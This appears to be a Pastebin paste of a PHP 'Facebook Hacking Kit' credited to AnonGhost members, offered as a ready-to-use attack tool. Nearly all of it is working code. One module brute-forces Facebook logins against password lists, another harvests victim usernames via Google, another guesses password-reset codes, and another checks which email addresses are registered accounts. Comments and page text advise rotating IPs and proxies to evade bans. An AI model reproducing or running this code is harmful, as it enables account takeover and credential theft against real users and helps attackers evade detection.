TP2K1_v1

Facebook Hacking Kit v1.2 by AnonGhost

Jun 26th, 2015
276
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.40 KB | None | 0 0
  1. <?php
  2. session_start();
  3. @ini_set("max_execution_time",0);
  4. @set_time_limit(0); #No Fx in SafeMode
  5. @ignore_user_abort(TRUE);
  6. @set_magic_quotes_runtime(0);
  7. ##############################################################################
  8. // Use your mind to escape Facebook Security \!/ #
  9. // Don't Allow Cookies in your browser (Use priv8 browsing) #
  10. // Change your IP and DNS each 2 seconds and your Job will be Great °_° #
  11. // GreetZ To : All AnonGhost MemberZ \!/ #
  12. // You can edit this script but don't forget to mention the authors °_° #
  13. // Tutorial Video: http://www.oni.vn/R9at9 #
  14. ##############################################################################
  15. echo '
  16. <html>
  17. <title>Facebook Kit Hacker V 1.2</title><link rel="shortcut icon" href="http://www14.0zz0.com/2014/06/04/21/396554394.png" type="image/x-icon" />
  18. <body style="background-color:black;">
  19. <style type="text/css">
  20. body {
  21. background:
  22. url("http://i.imgur.com/hg21xZ9.png") repeat ,
  23. url("http://www.albertpalacci.org/wp-content/uploads/2014/08/fb-relationships-full.png") no-repeat center top,top left,top right;
  24. background-color: #000000;
  25. }
  26. a{
  27. text-decoration:none;
  28. border:1px solid #12549c;
  29. border-radius:5px;
  30. background-color:black;
  31. color:white;
  32. font-family:Arial;
  33. font-size:17;
  34. box-shadow: 0px 0px 12px #21a0ed;
  35. }
  36. #r{
  37. border-bottom:1px solid #12549c;
  38. }
  39. </style>
  40.  
  41. <head>
  42. </body>
  43. </html>
  44. <center><font color="white" face="impact" size="7" align="center">Facebook Kit Hacker v 1.2</font></center>
  45. ';
  46.  
  47. echo '<center>'.base64_decode("PGltZyBzcmM9Imh0dHA6Ly93d3cucGF0cmlvdHNwb2ludC5vcmcvbmV3c19ldmVudHMvd3AtY29udGVudC9wbHVnaW5zL3RyYWNrYWJsZS1zb2NpYWwtc2hhcmUtaWNvbnMvYnV0dG9ucy9mMi8vZmFjZWJvb2sucG5nIi8+").'</center>';
  48.  
  49. echo '<center><font color="#007700" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">';
  50.  
  51. echo '</font></b></div><br></center>';
  52.  
  53. ?>
  54. <div id="det" align="center">
  55.  
  56. </div>
  57. </center>
  58. <div id="r" align="center">
  59. <a href="<?php echo htmlentities($_SERVER['PHP_SELF']); ?>">&nbsp;Home&nbsp;</a></font>
  60. <a href="?action=baipas">&nbsp;FB Brute Force&nbsp;</a></font>
  61. <a href="?action=brut">&nbsp;FB Ghost Catcher&nbsp;</a></font>
  62. <a href="?action=crack">&nbsp;FB Reset Code&nbsp;</a></font>
  63. <a href="?action=passgen">&nbsp;Reset Code Generator&nbsp;</a></font>
  64. <a href="?action=idgen">&nbsp;FB ID Generator&nbsp;</a></font>
  65. <a href="?action=graph">&nbsp;FB ID Checker&nbsp;</a></font>
  66. <a href="?action=emailchk">&nbsp;FB Email Checker&nbsp;</a></font>
  67. <audio autoplay> <source src="http://www.soundescapestudios.com/SESAudio/SES%20Site%20Sounds/Beeps/Beeps-short-01.wav" type="audio/mpeg"></audio>
  68. </div><br>
  69. <?php
  70. if(isset($_GET['action']) && $_GET['action'] == 'idgen'){
  71. @error_reporting(0);
  72. function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it xD wkwkwkkw !
  73. $validCharacters = "0123456789"; // Here you are free to choose how to randomize your words ^_^
  74. $validCharNumber = strlen($validCharacters);
  75. $len = 10;
  76. $result = "";
  77.  
  78. for ($i = 0; $i < $len; $i++) {
  79. $index = mt_rand(0, $validCharNumber - 1);
  80. $result .= $validCharacters[$index];
  81. }
  82.  
  83. return $result;
  84. }
  85. echo'
  86. <style>
  87. textarea {
  88. resize:none;
  89. color: #1975FF ;
  90. border:1px solid #1975FF ;
  91. border-left: 4px solid #1975FF ;
  92. }
  93. input {
  94. color: ##33CCFF;
  95. border:1px dotted #33CCFF;
  96. }
  97. </style>
  98. <p><center><font face="impact" color="White" size="4">Facebook ID Generator
  99. </center><center></font><br>
  100. <title>Facebook ID Generator</title>
  101. <form method="post">
  102. <font color="white">Number Of ID : <br><input type="text" name="nr"><br><br></font>
  103. <input type="submit" value="Generate" name="fbmailgen">
  104. </form><br>';
  105.  
  106. $len = $_POST['len'];
  107. $nr = $_POST['nr'];
  108. if ($_POST['fbmailgen']) {
  109. echo"<textarea style='resize:none;' class='area' cols='45' rows='10'>";
  110. for ($x=0; $x < $nr ; $x++){
  111. echo "10000" . getRandomString() . "\r\n";
  112. }
  113. echo "</textarea><br>";
  114. echo "
  115. <br>
  116. <b>
  117. </b>
  118. <br>
  119. ";
  120. }
  121. }
  122. if(isset($_GET['action']) && $_GET['action'] == 'passgen'){
  123. @error_reporting(0);
  124. function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it xD wkwkwkkw !
  125. $validCharacters = "0123456789"; // Here you are free to choose how to randomize your words ^_^
  126. $validCharNumber = strlen($validCharacters);
  127. $len = 6;
  128. $result = "";
  129.  
  130. for ($i = 0; $i < $len; $i++) {
  131. $index = mt_rand(0, $validCharNumber - 1);
  132. $result .= $validCharacters[$index];
  133. }
  134.  
  135. return $result;
  136. }
  137. echo'
  138. <style>
  139. textarea {
  140. resize:none;
  141. color: #1975FF ;
  142. border:1px solid #1975FF ;
  143. border-left: 4px solid #1975FF ;
  144. }
  145. input {
  146. color: ##33CCFF;
  147. border:1px dotted #33CCFF;
  148. }
  149. </style>
  150. <p><center><font face="impact" color="White" size="4">Facebook Reset Code Generator</font>
  151. </center><center><br>
  152. <title>Facebook Reset Code Generator</title>
  153. <form method="post">
  154. <font color="white">Number Of Reset Codes : &nbsp;&nbsp;<input type="text" name="nr"><br><br></font>
  155. <input type="submit" value="Generate" name="fbmailgen">
  156. </form><br>';
  157. $len = $_POST['len'];
  158. $nr = $_POST['nr'];
  159. if ($_POST['fbmailgen']) {
  160. echo"<textarea style='resize:none;' class='area' cols='20' rows='10'>";
  161. for ($x=0; $x < $nr ; $x++){
  162. echo getRandomString() . "\r\n";
  163. }
  164. echo "</textarea><br>";
  165. echo "
  166. <br>
  167. <b>
  168. </b>
  169. <br>
  170. ";
  171. }}
  172. if(isset($_GET['action']) && $_GET['action'] == 'brut'){
  173. echo"
  174. <style>
  175. textarea {
  176. resize:none;
  177. color: #1975FF ;
  178. border:1px solid #1975FF ;
  179. border-left: 4px solid #1975FF ;
  180. }
  181. input {
  182. color: ##33CCFF;
  183. border:1px dotted #33CCFF;
  184. }
  185. select {
  186. color: ##33CCFF;
  187. border:1px dotted #33CCFF;
  188. }
  189. </style>
  190. <title>F4c3b00k Gh0sT</title>
  191. <form method='POST'>
  192. <center><font face='impact' size='4' color='white'>Facebook Gh0sT Catcher by n0name-hax0r & Mauritania Attacker</font><br></center><br>
  193. <center>
  194. <center><font face='arial' size='1' color='red'>Server</font><br></center>
  195. <select name=country><br><br>
  196. <option value='Choose Country'>Choose The Country</option>
  197. <option value='site:fr-fr.facebook.com/'>France</option>
  198. <option value='site:ar-ar.facebook.com/'>Arab Countries</option>
  199. <option value='site:es-es.facebook.com/'>Spain</option>
  200. <option value='site:tr-tr.facebook.com/'>Turkey</option>
  201. <option value='site:de-de.facebook.com/'>Germany</option>
  202. <option value='site:pt-pt.facebook.com/'>Portugual</option>
  203. <option value='site:it-it.facebook.com/'>Italy</option>
  204. <option value='site:hi-in.facebook.com/'>India</option>
  205. <option value='site:sr-rs.facebook.com/'>Serbia</option>
  206. <option value='site:el-gr.facebook.com/'>Greece</option>
  207. <option value='site:he-il.facebook.com/'>Israel</option>
  208. <option value='site:id-id.facebook.com/'>Indonesia</option>
  209. <option value='site:ru-ru.facebook.com/'>Russia</option>
  210. <option value='site:nl-nl.facebook.com/'>Netherlands</option>
  211. <option value='site:bg-bg.facebook.com/'>Bulgaria</option>
  212. <option value='site:mk-mk.facebook.com/'>Macedonia</option>
  213. <option value='site:uk-ua.facebook.com/'>Ukraine</option>
  214. <option value='site:zh-cn.facebook.com/'>China</option>
  215. </select><br><br>
  216. </center>
  217. <center>
  218. <input type='text' name='victim' placeholder='Victim Name'><br><br>
  219. <textarea name='pass' style='resize:none;' rows='10' cols='20' placeholder='Password List'></textarea><br><br>
  220. <input type='submit' name='start' value='~~Start Catching~~'></center><br><br>
  221. </form>
  222. <center>
  223. <font color='white'>(Use this tool using proxy and change the proxy every 1-2 mins to avoid getting banned from google)</font><br><br>
  224. ";
  225. set_time_limit(0);
  226. ini_set('memory_limit', '64M');
  227. header('Content-Type: text/html; charset=UTF-8');
  228. function letItBy(){ ob_flush(); flush(); }
  229.  
  230. $country = $_POST['country'];
  231. $victim = $_POST['victim'];
  232. $bing = "{$country}"."{$victim}";
  233. $password = explode("\r\n",htmlentities($_POST['pass']));
  234. //Function that gets google urls
  235. function google_that($query, $page=1)
  236. {
  237. $resultPerPage=8;
  238. $start = $page*$resultPerPage;
  239. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
  240. $resultFromGoogle = json_decode( http_get($url, true) ,true);
  241. if(isset($resultFromGoogle['responseStatus'])) {
  242. if($resultFromGoogle['responseStatus'] != '200') return false;
  243. if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  244. else return $resultFromGoogle['responseData']['results'];
  245. }
  246. else
  247. die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
  248. }
  249. function http_get($url, $safemode = false){
  250. if($safemode === true) sleep(1);
  251. $im = curl_init($url);
  252. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  253. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  254. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  255. curl_setopt($im, CURLOPT_HEADER, 0);
  256. return curl_exec($im);
  257. curl_close();
  258. }
  259. function brute($user,$pass){
  260. $ch = curl_init();
  261. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
  262. curl_setopt($ch, CURLOPT_HEADER, 0);
  263. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  264. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  265. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  266. curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
  267. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  268. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  269. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
  270. $login = curl_exec($ch);
  271. //print_r($login);
  272. $check = (eregi('class="s t i u"',$login)) ? true:false;
  273. if($check == true){
  274. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font>&nbsp; Password : <font color='red'>$pass</font></font></p>";
  275. }else{
  276. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font>&nbsp; Password : <font color='green'>$pass</font></font></p>";
  277. }
  278. }
  279.  
  280.  
  281. if(isset($_POST['start'])){
  282.  
  283. letItBy();
  284. for($googlePage = 1; $googlePage <= 50; $googlePage++) {
  285. $googleResult = google_that($bing, $googlePage);
  286. if(!$googleResult) {
  287. echo 'Finished scanning.';
  288.  
  289. break;
  290. }
  291.  
  292. // Gets the username of victim
  293.  
  294. for($victim = 0; $victim < sizeof($googleResult); $victim++){
  295.  
  296. $result = $googleResult[$victim]['unescapedUrl'];
  297. if($country == "site:fr-fr.facebook.com/"){
  298. $rsss = str_replace("https://fr-fr.facebook.com/","",$result);
  299. }
  300. elseif($country == "site:ar-ar.facebook.com/"){
  301. $rsss = str_replace("https://ar-ar.facebook.com/","",$result);
  302. }
  303. elseif($country == "site:es-es.facebook.com/"){
  304. $rsss = str_replace("https://es-es.facebook.com/","",$result);
  305. }
  306. elseif($country == "site:tr-tr.facebook.com/"){
  307. $rsss = str_replace("https://tr-tr.facebook.com/","",$result);
  308. }
  309. elseif($country == "site:de-de.facebook.com/"){
  310. $rsss = str_replace("https://de-de.facebook.com/","",$result);
  311. }
  312. elseif($country == "site:pt-pt.facebook.com/"){
  313. $rsss = str_replace("https://pt-pt.facebook.com/","",$result);
  314. }
  315. elseif($country == "site:it-it.facebook.com/"){
  316. $rsss = str_replace("https://it-it.facebook.com/","",$result);
  317. }
  318. elseif($country == "site:hi-in.facebook.com/"){
  319. $rsss = str_replace("https://hi-in.facebook.com/","",$result);
  320. }
  321. elseif($country == "site:zh-cn.facebook.com/"){
  322. $rsss = str_replace("https://zh-cn.facebook.com/","",$result);
  323. }
  324. elseif($country == "site:sr-rs.facebook.com/"){
  325. $rsss = str_replace("https://sr-rs.facebook.com/","",$result);
  326. }
  327. elseif($country == "site:el-gr.facebook.com/"){
  328. $rsss = str_replace("https://el-gr.facebook.com/","",$result);
  329. }
  330. elseif($country == "site:he-il.facebook.com/"){
  331. $rsss = str_replace("https://he-il.facebook.com/","",$result);
  332. }
  333. elseif($country == "site:id-id.facebook.com/"){
  334. $rsss = str_replace("https://id-id.facebook.com/","",$result);
  335. }
  336. elseif($country == "site:ru-ru.facebook.com/"){
  337. $rsss = str_replace("https://ru-ru.facebook.com/","",$result);
  338. }
  339. elseif($country == "site:nl-nl.facebook.com/"){
  340. $rsss = str_replace("https://nl-nl.facebook.com/","",$result);
  341. }
  342. elseif($country == "site:bg-bg.facebook.com/"){
  343. $rsss = str_replace("https://bg-bg.facebook.com/","",$result);
  344. }
  345. elseif($country == "site:mk-mk.facebook.com/"){
  346. $rsss = str_replace("https://mk-mk.facebook.com/","",$result);
  347. }
  348. elseif($country == "site:uk-ua.facebook.com/"){
  349. $rsss = str_replace("https://uk-ua.facebook.com/","",$result);
  350. }
  351. $users = explode("?", $rsss);
  352. $users = $users[0];
  353.  
  354. //Bruteforce Function
  355.  
  356. foreach($password as $pass)
  357. {
  358.  
  359. echo brute($users,$pass);
  360. }}}}
  361.  
  362. #Added By AnonGuy From Madleets
  363. if(stristr(php_uname(),"Windows"))
  364. {system("del cookie.txt");}
  365. elseif(stristr(php_uname(),"Linux"))
  366. {system("rm cookie.txt");}}
  367. #
  368. if(isset($_GET['action']) && $_GET['action'] == 'baipas'){
  369. ob_start();
  370. @set_time_limit(0);
  371. echo "
  372. <head>
  373. <link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
  374. <form method='POST'>
  375. <title>Facebook Brute Force 2014</title>
  376. </head>
  377. <style>
  378. textarea {
  379. resize:none;
  380. color: #1975FF ;
  381. border:1px solid #1975FF ;
  382. border-left: 4px solid #1975FF ;
  383. }
  384. input {
  385. color: ##33CCFF;
  386. border:1px dotted #33CCFF;
  387. }
  388. </style>";
  389.  
  390. echo "
  391. <body text='#FFFFFF' >
  392. <center><font color='White' size=4 face='impact' >Facebook Multi-Account BruteForce by Mauritania Attacker&Noname-Haxor </center></font><br>
  393. <p dir='ltr' align='center'>
  394. <textarea cols='22' class='area' placeholder='Username' rows='14' name='username'></textarea>
  395. <textarea cols='22' class='area' placeholder='Password' rows='14' name='password'></textarea><br>
  396. <br>
  397. <input type='submit' name='scan' value='Start BruteForce'><br></p>";
  398. if(isset($_POST['scan'])){
  399. #To Put Proxy SOCKS V5
  400. //curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
  401. //curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  402. function brute($user,$pass){
  403. $ch = curl_init();
  404. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
  405. curl_setopt($ch, CURLOPT_HEADER, 0);
  406. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  407. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  408. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  409. curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
  410. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  411. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  412. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
  413. $login = curl_exec($ch);
  414. //print_r($login);
  415. $check = (eregi('class="s t i u"',$login)) ? true:false;
  416. if($check == true){
  417. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font>&nbsp; Password : <font color='red'>$pass</font></font></p>";
  418. }else{
  419. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font>&nbsp; Password : <font color='green'>$pass</font></font></p>";
  420. }
  421. }
  422.  
  423.  
  424.  
  425.  
  426. $username = explode("\n", htmlentities($_POST['username']));
  427. $password = explode("\n", htmlentities($_POST['password']));
  428.  
  429.  
  430. foreach($username as $users) {
  431. $users = @trim($users);
  432. foreach($password as $pass) {
  433. $pass = @trim($pass);
  434. echo brute($users,$pass);
  435. }
  436.  
  437. }
  438.  
  439.  
  440. #Added By AnonGuy From Madleets
  441. if(stristr(php_uname(),"Windows"))
  442. {system("del cookie.txt");}
  443. elseif(stristr(php_uname(),"Linux"))
  444. {system("rm cookie.txt");}}
  445. #
  446. }
  447.  
  448. if(isset($_GET['action']) && $_GET['action'] == 'crack'){
  449.  
  450. @set_time_limit(0);
  451. echo "<form method='POST'>
  452. <title>Facebook Code Security Cracker > By Mauritania Attacker</title>
  453. <style>
  454. /* Rounded Corners */
  455. #ghost {
  456. resize:none;
  457. color: #1975FF ;
  458. border:1px solid #1975FF ;
  459. border-left: 4px solid #1975FF ;
  460. height: 250px;
  461. width: 200px; }
  462. input {
  463. /* INPUTS */
  464. border: 1px solid #12549c;
  465. }
  466. </style>
  467. <center><font color='White' size='4' face='impact'>Facebook 0day Exploit Reset Code Priv8 By Mauritania Attacker</center><br>
  468. <center><input type='text' name='target' placeholder='Victim'></center><br>
  469. <center><textarea cols='10' rows='6' id='ghost' placeholder='Reset Codes' name='code'></textarea><br></center>
  470. <p><center><input type='submit' value='Crack Reset Code' name='scan'><br><br></center></p>
  471. </form>";
  472. $target=$_POST['target'];
  473. $user = explode("\r\n", htmlentities($_POST['code']));
  474. if($_POST['scan'])
  475. {
  476. foreach($user as $code)
  477. {
  478. // Curl Function ^_^
  479. $ch = curl_init();
  480. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/recover/password?u={$target}&n={$code}");
  481. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  482. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  483. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  484. curl_setopt($ch, CURLOPT_HEADER, 1);
  485. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  486. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  487. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114");
  488.  
  489. $check = curl_exec($ch);
  490. if(eregi("password_new", $check)) //Keyword Good Response ^_^
  491. {
  492. echo "<font face='Tahoma' size='2' color='green'>{$code} => Facebook Confirmation Code Found ^_^ </font><br>";
  493. }
  494. else
  495. {
  496. echo "<font face='Tahoma' size='2' color='red'>{$code} => Incorrect Code Trying More...</font><br>";
  497. }
  498. curl_close($ch);
  499. }
  500. }
  501. #Added By AnonGuy From Madleets
  502. if(stristr(php_uname(),"Windows"))
  503. {system("del cookie.txt");}
  504. elseif(stristr(php_uname(),"Linux"))
  505. {system("rm cookie.txt");}
  506. #
  507.  
  508. }
  509. ob_end_flush();
  510.  
  511. echo '<center><font color="red" face="arial" size="2" align="">Coded By Mauritania Attacker & n0name-hax0r</font></center>';
  512.  
  513. if(isset($_GET['action']) && $_GET['action'] == 'graph'){
  514.  
  515.  
  516.  
  517. @set_time_limit(0);
  518. echo "<form method='POST'>
  519. <title>Facebook ID's Checker By Mauritania Attacker</title>
  520. <style>
  521. /* Rounded Corners */
  522. #ghost {
  523. resize:none;
  524. color: #1975FF ;
  525. border:1px solid #1975FF ;
  526. border-left: 4px solid #1975FF ;
  527. height: 250px;
  528. width: 200px; }
  529. input {
  530. /* INPUTS */
  531. border: 1px solid #12549c;
  532. }
  533. </style>
  534. <center><font color='White' size='4' face='impact'>Facebook ID's Checker By Mauritania Attacker</center><br>
  535. <center><textarea cols='10' rows='6' id='ghost' placeholder='ID Here ^^' name='code'></textarea><br></center>
  536. <p><center><input type='submit' value='Check Now' name='scan'><br><br></center></p>
  537. </form>";
  538.  
  539. $user = explode("\r\n", htmlentities($_POST['code']));
  540. if($_POST['scan'])
  541. {
  542. foreach($user as $code)
  543. {
  544. // Curl Function ^_^
  545. $ch = curl_init();
  546. curl_setopt($ch, CURLOPT_URL, "https://graph.facebook.com/{$code}");
  547. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  548. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  549. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  550. curl_setopt($ch, CURLOPT_HEADER, 1);
  551. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  552. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  553. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114");
  554.  
  555. $check = curl_exec($ch);
  556. if(eregi("username", $check)) //Keyword Good Response ^_^
  557. {
  558. echo "<center><font face='Tahoma' size='2' color='green'><a href='http://graph.facebook.com/{$code}' target='_blank'>$code => ID IS CORRECT ^_^</a> </font><br></center>";
  559. }
  560. else
  561. {
  562. echo "<center><font face='Tahoma' size='2' color='red'><a href='http://graph.facebook.com/{$code}' target='_blank'>$code => ID IS FALSE :(</a></font><br></center>";
  563. }
  564. curl_close($ch);
  565. }
  566. }
  567. #Added By AnonGuy From Madleets
  568. if(stristr(php_uname(),"Windows"))
  569. {system("del cookie.txt");}
  570. else if(stristr(php_uname(),"Linux"))
  571. {system("rm cookie.txt");}}
  572. #
  573. echo "</center><center>";
  574.  
  575.  
  576. if(isset($_GET['action']) && $_GET['action'] == 'emailchk'){
  577. //AnonGhost Team is Everywhere \!/
  578. ob_start();
  579. @set_time_limit(0);
  580. error_reporting(E_ERROR | E_PARSE);
  581. echo "
  582. <body bgcolor='black'>
  583. <head>
  584. <link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
  585. <form method='POST'>
  586. <title>Facebook Email Checker</title>
  587. </head>";
  588. echo "
  589. <style>
  590. #s{
  591. margin-bottom:15px;}
  592. textarea{
  593. resize:none;
  594. background-color:black;
  595. color:#26a1ff;
  596. border:1px solid #0088ec;
  597. border-radius:10px;
  598. box-shadow:0px 0px 10px #26a1ff;
  599. }
  600. input{
  601. color:#0088ec;
  602. background-color:black;
  603. border:1px solid #0088ec;
  604. }
  605. </style>
  606. <center><b><br><br><font face='impact' size='5' color='red'><img width='85' height='85' src='http://i.imgur.com/Bpshup3.png'><img id='s' src='http://i.imgur.com/6e41km8.jpg'><br></font></b></center>
  607. <p dir='ltr' align='center'>
  608. <center><textarea cols='39' rows='12' id='ghost' name='email' >mauritania-attacker@hotmail.com
  609. nonamehaxor@hotmail.com
  610. lolololof@lol.com</textarea><br></center><br>
  611. <center><input type='submit' name='scan' value='Start checking'><br><br>
  612. <input type='checkbox' name='save' value='Save Working Facebook Emails to fbemails.txt file'><font color='#0088ec'>Save Working Facebook Emails to fbemails.txt file</font><br></p></center>";
  613. $emailz = explode("\r\n", htmlentities($_POST['email']));
  614. if($_POST['scan'])
  615. {
  616. foreach($emailz as $email)
  617. {
  618. // Curl Function ^_^
  619. $ch = curl_init();
  620. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login/identify/?ctx=recover");
  621. curl_setopt($ch, CURLOPT_HEADER, 1);
  622. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  623. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  624. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  625. curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$email}");
  626. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  627. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  628.  
  629. $check = curl_exec($ch);
  630. if(eregi("recover_method", $check)) //Keyword Good Response ^_^ \!/
  631. {
  632. echo "<center><font face='Tahoma' size='2' color='green'>$email => Facebook User Email Found ^_^</a> </font><br></center>";
  633. if(isset($_POST['save'])){
  634. $handle= fopen ("fbemails.txt",a);
  635. fwrite($handle,$email . "\r\n");
  636. fclose();
  637. }
  638. }
  639. else
  640. {
  641. echo "<center><font face='Tahoma' size='2' color='red'>$email => Not a Facebook Email :(</a></font><br></center>";
  642. }
  643. curl_close($ch);
  644. }
  645. }
  646.  
  647. # Delete Cookies wkwkwkwkw \!/
  648. if(stristr(php_uname(),"Windows"))
  649. {system("del cookie.txt");}
  650. else if(stristr(php_uname(),"Linux"))
  651. {system("rm cookie.txt");}}
  652. #
  653. ob_end_flush();
  654. ?>
Add Comment
Please, Sign In to add comment